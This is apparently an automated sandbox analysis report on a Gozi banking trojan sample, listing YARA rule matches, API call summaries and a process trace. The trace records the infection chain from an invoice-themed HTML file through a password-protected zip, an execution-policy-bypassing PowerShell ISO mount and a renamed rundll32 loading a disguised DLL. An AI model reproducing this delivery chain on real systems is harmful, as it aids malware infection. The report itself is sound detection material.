                Source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: xxl.exe PID: 6504, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: Process Memory Space: xxl.exe PID: 6504, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB4C9B
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B2792
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B2DCC
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B82FC
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_10002284
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB58CA PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxWWorker,CreateActCtxWWorker,GetModuleHandleW,CreateActCtxWWorker,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB5C96 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB3F9E HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB3F00 NtQuerySystemInformation,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB5D14 NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B8521 NtQueryVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_10001000 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_10001D37 NtMapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_10001BA8 GetProcAddress,NtCreateSection,memset,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_100024A5 NtQueryVirtualMemory,
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xxl.exe 4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
                Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1828,i,17767483613737774087,6421309370746719837,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Invoice_7892_18Oct.html
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -p758493 -y -o"C:\Users\user\AppData\Local\Temp\krjmempf.vdz" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip
                Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso"
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c internee\highlighted.cmd dll32.exe tem dows
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\xxl.exe C:\Users\user\AppData\Local\Temp\xxl.exe internee\reservations.3ds,DllRegisterServer
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1828,i,17767483613737774087,6421309370746719837,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -p758493 -y -o"C:\Users\user\AppData\Local\Temp\krjmempf.vdz" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c internee\highlighted.cmd dll32.exe tem dows
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\xxl.exe C:\Users\user\AppData\Local\Temp\xxl.exe internee\reservations.3ds,DllRegisterServer
                Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\4b10409d-3549-47cf-a702-af843c5f693a.tmpJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\unarchiver.logJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winHTML@46/10@6/8
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB3E1D CoInitializeEx,CLSIDFromString,CoCreateInstance,CoUninitialize,
                Source: C:\Windows\SysWOW64\unarchiver.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB3A94 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,
                Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B7256 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCommand line argument: WLDP.DLL
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCommand line argument: localserver
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
                Source: Binary string: rundll32.pdb source: xxl.exe, xxl.exe, 0000000E.00000000.368749240.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, xxl.exe.12.dr
                Source: Binary string: rundll32.pdbGCTL source: xxl.exe, 0000000E.00000000.368749240.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, xxl.exe.12.dr
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB68E0 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB6C9F pushad ; retf
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB6989 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B7F00 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031BB859 push 0000006Fh; retf
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B82EB push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_10002220 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_10002273 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_03140E56 push dword ptr [ebp+ebx*4+03h]; ret
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_03141C94 push 23000002h; ret
                Source: xxl.exe.12.drStatic PE information: section name: .didat
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_100015BD LoadLibraryA,GetProcAddress,
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\xxl.exeJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: Yara matchFile source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: xxl.exe PID: 6504, type: MEMORYSTR
                Source: Yara matchFile source: 14.2.xxl.exe.4ef94a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.10000000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.31b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2dfe040.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.719611917.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719379551.0000000002DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
